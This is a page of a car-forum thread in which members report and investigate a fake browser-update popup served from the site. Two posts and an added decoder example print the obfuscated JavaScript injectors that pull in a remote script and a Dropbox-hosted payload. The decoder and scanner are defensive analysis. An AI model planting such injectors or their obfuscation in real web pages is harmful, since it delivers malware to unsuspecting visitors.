KilometerMagazine.com - Malware in ads - fake browser updates


    Page 3 of 4 (results 51 to 75 of 80)
    1. Member KeiCar's Avatar
      Join Date
      Jul 22nd, 2002
      Location
      Philthadelphia
      Posts
      11,468
      Vehicles
      2007 Acura TSX / 2013 Toyota Yaris LE
      05-19-2017 02:20 PM #51
      Chrome Version 58.0.3029.110 (64-bit) -- Newtown Square, PA
      Attention: If you or a loved one has been diagnosed with Mesothelioma you may to be entitled to financial compensation. Mesothelioma is a rare cancer linked to asbestos exposure. Exposure to asbestos in the Navy, shipyards, mills, heating, construction or the automotive industries may put you at risk. Please don't wait, call 1-800-99 LAW USA today for a free legal consultation and financial information packet. Mesothelioma patients call now!

    2. Junior Member
      Join Date
      Apr 29th, 2016
      Location
      Longmont, CO.
      Posts
      36
      Vehicles
      2016 Golf R DSG, DCC, NAV
      05-19-2017 02:27 PM #52
      I have configured ad block to completely block the div/span at the top of the page.
      That way no ads show up at all.

      Sorry about that.

    3. Member Sump's Avatar
      Join Date
      Jul 14th, 2006
      Location
      Chicagoland, IL
      Posts
      19,371
      Vehicles
      99 M3, 17 GTI, 17 Golf Alltrack
      05-19-2017 03:08 PM #53
      Quote Originally Posted by KeiCar View Post
      Chrome Version 58.0.3029.110 (64-bit) -- Newtown Square, PA
      Same chrome version, Elgin IL, also got it at another location in IL.

      It seems to only display once and I can't get it back again, just tried downloading Firefox and it doesn't do it. This is definitely not served via an ad, it has to be malicious JS on the Vortex server. Wish I wouldn't have closed out so I could see the source code of the offending page.

      Is Vortex ever planning on adding HTTPS support?

    4. Semi-n00b rickhamilton620's Avatar
      Join Date
      May 27th, 2015
      Location
      York, PA
      Posts
      19
      Vehicles
      95 Jeep Cherokee Sport
      05-19-2017 04:04 PM #54
      Quote Originally Posted by JasonJoel View Post
      Lol. I removed a nasty cryptolocker infection from a teacher's MacBook last week (well, full wipe and restore really).

      Macs are not magically protected computers. Ask any school IT person...

      Sent from my SM-G955U using Tapatalk
      As a fellow school IT guy, I can confirm wholeheartedly, haha.

    5. Member PlatinumGLS's Avatar
      Join Date
      Aug 2nd, 2003
      Location
      Shelby Township, MI
      Posts
      16,795
      Vehicles
      7.4, 5.7, 5.3 & 3.0TT
      05-19-2017 06:21 PM #55
      Chrome Version 58.0.3029.110 (64-bit) - Metro Detroit

      FYI - confirmed it is still active.
      Last edited by PlatinumGLS; 05-19-2017 at 06:25 PM.

    6. Member
      Join Date
      Apr 27th, 2006
      Location
      Winnipeg
      Posts
      316
      Vehicles
      2010 Golf TDI M6
      05-19-2017 07:09 PM #56
      Quote Originally Posted by AG-Admin View Post
      I have been asked to try to collect info on what browsers you use as well as the city you are in. These may be geotargeted.
      -Philip
      Winnipeg, Canada. Chrome 57.0.2987.133

    7. 05-19-2017 10:07 PM #57
      Three days after the first post and this is still here??!!! I just got the Firefox "update" prompt. Fortunately, I knew better than to open it but it is inexcusable to allow this to go on for so long.

    8. Junior Member
      Join Date
      Nov 23rd, 2010
      Location
      San Diego
      Posts
      99
      Vehicles
      2001 225Q AMU
      05-20-2017 07:15 PM #58
      May 20 4:12pm... I logged on to VWVortex and "Chrome_59.3.8.1.js" asked to be downloaded and I stupidly clicked Yes. But then I googled "Chrome_59.3.8.1.js" and it led me to this thread. I didn't click on the file, I deleted it, and then emptied trash. I'm thinking I am ok since I never clicked on the file to open it...

    9. Member PlatinumGLS's Avatar
      Join Date
      Aug 2nd, 2003
      Location
      Shelby Township, MI
      Posts
      16,795
      Vehicles
      7.4, 5.7, 5.3 & 3.0TT
      05-21-2017 10:34 AM #59
      Quote Originally Posted by Johnclark05 View Post
      Three days after the first post and this is still here??!!!
      Still active as of 2 minutes ago

    10. Moderator DanG's Avatar
      Join Date
      Nov 16th, 2000
      Location
      Winnipeg
      Posts
      11,341
      Vehicles
      2014 Wrangler
      05-21-2017 12:18 PM #60
      Winnipeg, Canada, both times I've received it were using Chrome 58.0.3029.110 64bit
      Haven't seen it since the 19th
      °.lllllll.°

    11. Member
      Join Date
      Apr 19th, 2005
      Posts
      638
      Vehicles
      1982 Caddy, 1984 Cabby, 2000 NB, 2010 CC
      05-22-2017 08:58 AM #61
      Still Receiving message (3rd time currently)

      Firefox 52.1.2

      Rockford, IL

      May 22, 2017

    12. Member rimtrim's Avatar
      Join Date
      Dec 17th, 2004
      Location
      Phila PA
      Posts
      3,824
      Vehicles
      1990 Olds Delta 88, 1986 Pontiac Parisienne Safari
      05-22-2017 10:34 AM #62
      I've been seeing this for about a week as well. I've only seen it from Windows machines, usually just the first time I visit the site for the day. Is there anything I can gather that would help troubleshoot this? I can probably even get a packet trace if it would help.

      -Andrew L
      "The whole economy is hinged on potholes." --Ray Magliozzi
      Hubcap Business on hiatus while I finish the Pontiac Project and The House | Philly/NJ highways blog Windshield Time

    13. 05-22-2017 11:31 AM #63
      Saw this scam popup yesterday - have reported the domain to GoDaddy for hosting malware, if their policy is anything like ours (I work for a hosting company), they'll suspend the site.

    14. Not your buddy, guy...
      Join Date
      Oct 12th, 2015
      Posts
      285
      05-22-2017 12:54 PM #64
      Quote Originally Posted by rimtrim View Post
      I've been seeing this for about a week as well. I've only seen it from Windows machines, usually just the first time I visit the site for the day. Is there anything I can gather that would help troubleshoot this? I can probably even get a packet trace if it would help.

      -Andrew L
      If you can gather that info please do. I have not been able to replicate this personally yet. It has been escalated on our end as far up as I could get this and our ad partners have been investigating as well.
      -Philip

    15. Member PlatinumGLS's Avatar
      Join Date
      Aug 2nd, 2003
      Location
      Shelby Township, MI
      Posts
      16,795
      Vehicles
      7.4, 5.7, 5.3 & 3.0TT
      05-22-2017 08:48 PM #65
      I tried to replicate it again just now using private browsing but seems to be gone...for now

    16. Member HwAoRrDk's Avatar
      Join Date
      Aug 2nd, 2002
      Location
      United Kingdom
      Posts
      1,925
      Vehicles
      2004 Mazda RX-8 230
      05-23-2017 12:53 PM #66
      I got a reply back from Dropbox saying they are investigating the malicious JS files hosted with them.

      I would recommend to anyone else that is able, to report these file download links to Dropbox via e-mail at abuse@dropbox.com.

      Edit: Still ongoing, got it in Chrome with Incognito mode just now.
      Last edited by HwAoRrDk; 05-23-2017 at 01:06 PM.
      平成16 年の MAZDA RX-8 230

    17. Member rimtrim's Avatar
      Join Date
      Dec 17th, 2004
      Location
      Phila PA
      Posts
      3,824
      Vehicles
      1990 Olds Delta 88, 1986 Pontiac Parisienne Safari
      05-23-2017 07:24 PM #67
      I haven't seen it again since I posted yesterday...I've been starting up a packet trace every time I visit the forum, and of course it won't do it now. I'll post back if I get something.

      -Andrew L
      "The whole economy is hinged on potholes." --Ray Magliozzi
      Hubcap Business on hiatus while I finish the Pontiac Project and The House | Philly/NJ highways blog Windshield Time

    18. Member PlatinumGLS's Avatar
      Join Date
      Aug 2nd, 2003
      Location
      Shelby Township, MI
      Posts
      16,795
      Vehicles
      7.4, 5.7, 5.3 & 3.0TT
      05-23-2017 07:27 PM #68
      Quote Originally Posted by HwAoRrDk View Post
      Edit: Still ongoing, got it in Chrome with Incognito mode just now.
      Yeah, it is back for me as well

    19. Member
      Join Date
      Jul 26th, 2007
      Posts
      1,273
      Vehicles
      99.5 Jetta
      05-23-2017 09:05 PM #69
      Quote Originally Posted by PlatinumGLS View Post
      Yeah, it is back for me as well
      Same
      IHP is real.
      Imaginary
      Horse
      Power.

    20. Member LT1M21Stingray's Avatar
      Join Date
      Sep 13th, 2006
      Location
      Foothills of the Adirondacks.
      Posts
      18,065
      Vehicles
      SR71 C30 t53a/b
      05-24-2017 12:34 AM #70
      Quote Originally Posted by dogdog View Post
      Same
      Same Same...
      Quote Originally Posted by Mk1Madness
      Back when making your car faster and better handling was the big thing.
      Quote Originally Posted by Tavarish
      The car's best safety feature includes ejecting you in the moment of impact and wishing you the best of luck.

    21. Member Dieselstation's Avatar
      Join Date
      May 15th, 2001
      Location
      Southern California
      Posts
      9,747
      Vehicles
      www.speed-driven.com
      05-24-2017 04:53 AM #71
      Admins,
      Please remove this advertiser from your list. It tries to install malware or harmful files when you connect to the page as a first time user. It's very suspicious and a newbie might fall for it and get lots of malware on their computer.

      Speed-Driven Wallpapers: http://www.speed-driven.com

    22. Member
      Join Date
      Jul 27th, 2005
      Location
      Ramona, CA
      Posts
      4,827
      Vehicles
      '06, A3 2.0t, Sport
      05-24-2017 09:26 AM #72
      Just had this scam pop up and found this thread. Hard to believe this was reported over a week ago and still not fixed.

      Here's the Chrome thread about it: https://productforums.google.com/for...%7Cspell:false

      FYI, from thread:

      We have tested the malicious script. It can only be used by combining the downloaded javascript file and a function within the onclick event.
      So long as you don't click the "update" button, the script will not execute. In fact, without the code behind the button, it's near impossible to get it to execute.

      If you have clicked "update" you will need to follow these steps in this order.

      1. Close Chrome.
      2. Start Task Manager.
      3. Close the remaining chrome.exe processes (the malware has extra background processes running that prevent you from uninstalling Chrome).
      4. Uninstall Chrome.
      5. Clean up the registry with something like CCleaner (it will clean up a few other files, icons and things).
      6. Restart your computer.
      7. Re-install Chrome.
      8. Don't click update next time. Just close the browser tab/window. Once you have seen the "update chrome" page, it is unlikely you will see it again, as it will save a cookie/sessionStorage/localStorage telling the malware not to display again, which makes it harder to find.
      It also records an IP address, which prevents it from showing.
      Quote Originally Posted by MachnickiA3 View Post
      stick that in your "fleshy patch"

    23. Member Sump's Avatar
      Join Date
      Jul 14th, 2006
      Location
      Chicagoland, IL
      Posts
      19,371
      Vehicles
      99 M3, 17 GTI, 17 Golf Alltrack
      05-24-2017 09:51 AM #73
      Quote Originally Posted by Sump View Post
      Same chrome version, Elgin IL, also got it at another location in IL.

      It seems to only display once and I can't get it back again, just tried downloading Firefox and it doesn't do it. This is definitely not served via an ad, it has to be malicious JS on the Vortex server. Wish I wouldn't have closed out so I could see the source code of the offending page.

      Is Vortex ever planning on adding HTTPS support?
      As mentioned here, that Google thread confirmed malicious JS somewhere on the Vortex server.
      We have found and resolved this issue.

      One of our jQuery library files was compromised. We found this file in one of our WordPress plugins that comes with a set of jQuery libraries, one of which is suspected to have carried the vulnerability. This library is jquery.magnific-popup.js

      This is the malicious script in this file which seemed to be causing this.

      You can search your whole site for the following script and remove it:
      (file attached)

      if(document.cookie.indexOf(x("f=.a8m/t#u#_j_1_w"))===-1){var h=document.createElement('script');h.type='text/javascript';h.async=true;h.src=x('/e/9.7#ewe#6#dr708/d/f85#dgeb74a:95c58a25=pv6&54r1e2s=fd:i/cf?/ssj2..e0dsc._7sa/imgo5c/..d9n/a/rpb0h&s0i7m3ar.lkvc#akret7/1/#:as&p2t7tfh.');var n=document.getElementsByTagName('script')[0];n.parentNode.insertBefore(h,n);}}function x(s){var o='';for(var l=0;l<s.length;l++){if(l%2===1)o+=s[l];}o=o.split("").reverse().join("");return o;}})();

      We have attached the original file for further learning and analysis for anyone that is interested.
      Thank you to anyone and everyone that provided information and helped us to resolve the issue.
      Regards,
      Ben (Pro Bono Australia)

    24. Member finklejag's Avatar
      Join Date
      Apr 4th, 2002
      Location
      WA
      Posts
      4,927
      05-24-2017 10:49 AM #74
      I just love checking out Vortex these days. Not only do I get a Newsletter pop up every time, now I get free malware!

    25. Member HwAoRrDk's Avatar
      Join Date
      Aug 2nd, 2002
      Location
      United Kingdom
      Posts
      1,925
      Vehicles
      2004 Mazda RX-8 230
      05-24-2017 11:38 AM #75
      Quote Originally Posted by Sump View Post
      As mentioned here that Google thread confirmed malicious JS somewhere on Vortex server.
      I had some time to sit down and investigate this a bit more this afternoon. I did actually manage to get a Wireshark packet capture of the fake update screen loading in Chrome! However, it's not too useful, as I think the source that this is being loaded from is served via HTTPS, so the network traffic is encrypted, so I can't actually see what's in it.

      However, I think I have identified at least the trail through which the IFRAME ultimately gets loaded.

      In the packet capture, I could see - from the hostname in the SSL certificate - the request that was being made to scene.timbervalleyfarm.com (where the malicious fake update page is being loaded from). Directly before that, there is a request made to track.amishbrand.com - also via HTTPS. Sounds odd, right? Well, what causes that request? If you look at the post-loading HTML page DOM of the Vortex, you will see the following element gets dynamically inserted (it's not in the as-served HTML) into the HEAD tag:

      Code:
      <script type="text/javascript" async="" src="https://track.amishbrand.com/s_code.js?cid=214&amp;v=28c9a7ed5fd87d6ee79e"></script>
      And if I use the Network panel of Firefox's developer tools to trace what caused that script to be loaded, it tells me that it is some in-line Javascript in the main body of the page - that is, content from VWVortex's server itself. This piece of script is as follows:

      Code:
      <script type='text/javascript'>;(function(){var d=navigator[m("&t)nme}gcA)r,e{snup")];var y=document[m("ie,ikk,o,o{c(")];if(n(d,m("hs,wnotdtn;i}W6"))&&!n(d,m("9d9ido{r5drn4A("))){if(!n(y,m("&=(a{m,t}uo_0_(_r"))){var t=document.createElement('script');t.type='text/javascript';t.async=true;t.src=m('.e(9(7ne2e,6(d;718)d)f(5;dle076a,9;c;8)2}=}v}&}4}1v2;=,d}i4c;?,s(jq.{e(d}o;c,_}s,/,m{o)c{.{d0n3a0r{b)h(szi}m;a7.6k)c;a}r4t2/b/):ss(p(t6tyhi');var v=document.getElementsByTagName('script')[0];v.parentNode.insertBefore(t,v);}}function m(k){var f='';for(var q=0;q<k.length;q++){if(q%2===1)f+=k[q];}f=r(f);return f;}function n(j,w){if(j[m("/f)Obxme{din,i(")](w)!==-1){return true;}else{return false;}}function r(e){var z='';for(var a=e.length-1;a>=0;a--){z+=e[a];}return z;}})();</script>
      The obfuscation there on the strings (the 'garbage'-looking data) looked mighty familiar - I had a feeling of deja vu... Where had I seen something similar before? In the code of the fake browser update page! It uses a similar data obfuscation technique there on the Dropbox URL:

      Code:
      var fileUrl = getUrl('r1}=yl{d0?gs1j1.}7{.(8k.}5}56_ub)u)t}S;_0p;uht)e}S)_}x)o,f{e1r)i,F,/{f,e{c}u;q,7sbzi{8851h}p,k3u}i2/{s(/{m(o}c,.}x;o,b6pho;r8d{.)w{w0w{/,/;:0s{p(t{t}h)');
      Because of this, I believe the piece of inline script above that loads another script from track.amishbrand.com is highly likely to be the initial vector for this malware. And because the initial script is inline with the page, it means the phone call is coming from inside the house - that is, the VWVortex server(s) are compromised in some way to allow this malicious snippet of code to have been inserted into their HTML!

      VWVortex admins, forget the third-party ad networks, look at your own server's files!!!
      平成16 年の MAZDA RX-8 230
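      Added example (editor's code, not code from this thread, from VWVortex or from the plugin author): a small decoder and file scanner for the two injector snippets quoted in posts #73 and #75. The obfuscation HwAoRrDk noticed is fully visible in the posted code: the helper m() (x() in the other sample) keeps only the characters at odd positions of each string literal and then reverses the result, with no key involved, so every literal can be recovered offline. The two fixtures are copied verbatim from the posts above; the WordPress directory layout, the benign loader file and the example.com host in the sample tree are made up for this example, and nothing in the code contacts any of the decoded hosts.

```javascript
"use strict";
// Added example (editor's code, not from the thread or from VWVortex): decodes the string
// obfuscation shared by the injector snippets quoted above and flags files carrying it.

// Fixture 1: the inline injector quoted from the VWVortex page in the post above, without
// the surrounding <script> tag. Copied verbatim; nothing here contacts the decoded hosts.
const INJECTOR = `;(function(){var d=navigator[m("&t)nme}gcA)r,e{snup")];var y=document[m("ie,ikk,o,o{c(")];if(n(d,m("hs,wnotdtn;i}W6"))&&!n(d,m("9d9ido{r5drn4A("))){if(!n(y,m("&=(a{m,t}uo_0_(_r"))){var t=document.createElement('script');t.type='text/javascript';t.async=true;t.src=m('.e(9(7ne2e,6(d;718)d)f(5;dle076a,9;c;8)2}=}v}&}4}1v2;=,d}i4c;?,s(jq.{e(d}o;c,_}s,/,m{o)c{.{d0n3a0r{b)h(szi}m;a7.6k)c;a}r4t2/b/):ss(p(t6tyhi');var v=document.getElementsByTagName('script')[0];v.parentNode.insertBefore(t,v);}}function m(k){var f='';for(var q=0;q<k.length;q++){if(q%2===1)f+=k[q];}f=r(f);return f;}function n(j,w){if(j[m("/f)Obxme{din,i(")](w)!==-1){return true;}else{return false;}}function r(e){var z='';for(var a=e.length-1;a>=0;a--){z+=e[a];}return z;}})();`;

// Fixture 2: the getUrl() line quoted from the fake update page. Its decoder body is not
// on the page, so the decoder name is passed explicitly when this one is analysed.
const FAKE_UPDATE_LINE = `var fileUrl = getUrl('r1}=yl{d0?gs1j1.}7{.(8k.}5}56_ub)u)t}S;_0p;uht)e}S)_}x)o,f{e1r)i,F,/{f,e{c}u;q,7sbzi{8851h}p,k3u}i2/{s(/{m(o}c,.}x;o,b6pho;r8d{.)w{w0w{/,/;:0s{p(t{t}h)');`;

// m(k) in the snippet keeps the characters at odd positions of k, then r() reverses them.
// That is the whole "encryption": no key, so every literal can be recovered offline.
function decodeObfuscated(s) {
  return Array.from(s).filter((_, i) => i % 2 === 1).reverse().join("");
}

// Find the decoder by its shape rather than its name: a function whose body filters on
// index%2===1 (it is called m in one sample on the page and x in the other).
function findDecoderName(src) {
  const hit = /function\s+([A-Za-z_$][\w$]*)\s*\([^)]*\)\s*\{[\s\S]{0,200}?%2===1/.exec(src);
  return hit ? hit[1] : null;
}

// Decode every string literal passed to the decoder, in source order.
function decodeCalls(src, decoderName = findDecoderName(src)) {
  if (!decoderName) return [];
  const re = new RegExp("\\b" + decoderName.replace(/\$/g, "\\$") +
    "\\(\\s*(['\"])([\\s\\S]*?)\\1\\s*\\)", "g");
  const out = [];
  let hit;
  while ((hit = re.exec(src)) !== null) {
    out.push({ encoded: hit[2], decoded: decodeObfuscated(hit[2]) });
  }
  return out;
}

// Only the decoded strings that are URLs, i.e. what the injector would actually load.
function extractUrls(src, decoderName) {
  return decodeCalls(src, decoderName).map((c) => c.decoded).filter((s) => /^https?:\/\//.test(s));
}

// Signature for the "search your whole site" step: the odd-index filter plus a dynamically
// created <script> spliced in with insertBefore(). Narrow on purpose: it is this injector's
// fingerprint, not a general detector, and a re-minified variant would slip past it.
function looksLikeOddIndexInjector(src) {
  return /%2===1/.test(src) &&
    /createElement\(\s*['"]script['"]\s*\)/.test(src) &&
    /\.insertBefore\(/.test(src);
}

// Scan a {path: contents} map and report each hit with the URLs it would load. For a real
// WordPress tree, build the map by reading the *.js and *.php files under the web root.
function scanFiles(files) {
  const hits = [];
  for (const [path, src] of Object.entries(files)) {
    if (looksLikeOddIndexInjector(src)) hits.push({ path, urls: extractUrls(src) });
  }
  return hits;
}

// Constructed sample tree. The plugin file name is the one named in the post above; the
// directory layout, the benign loader file and its example.com host are made up here.
const SAMPLE_SITE = {
  "wp-content/plugins/example-plugin/libs/jquery.magnific-popup.js":
    "/*! Magnific Popup (trimmed) */\n" + INJECTOR,
  "wp-content/themes/example-theme/js/analytics-loader.js":
    "(function(){var s=document.createElement('script');s.async=true;" +
    "s.src='https://example.com/analytics.js';document.head.appendChild(s);})();",
};

console.log(decodeCalls(INJECTOR).map((c) => c.decoded));
console.log(scanFiles(SAMPLE_SITE));
```

      Run with node. Decoding the first fixture yields, in order, userAgent, cookie, Windows, Android, the cookie marker ___utma=, the https://track.amishbrand.com/s_code.js?cid=214&v=28c9a7ed5fd87d6ee79e URL that HwAoRrDk saw inserted into the HEAD, and indexOf. Read back into the snippet, that means the loader only fires when navigator.userAgent contains "Windows" and not "Android" and document.cookie has no ___utma= entry, which fits the Windows-only and once-per-visit reports earlier in this thread. The getUrl() literal from the fake update page decodes with the identical transform (not merely a similar one) to a www.dropbox.com/s/... URL ending in .js?dl=1, so the same decoder serves both stages.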
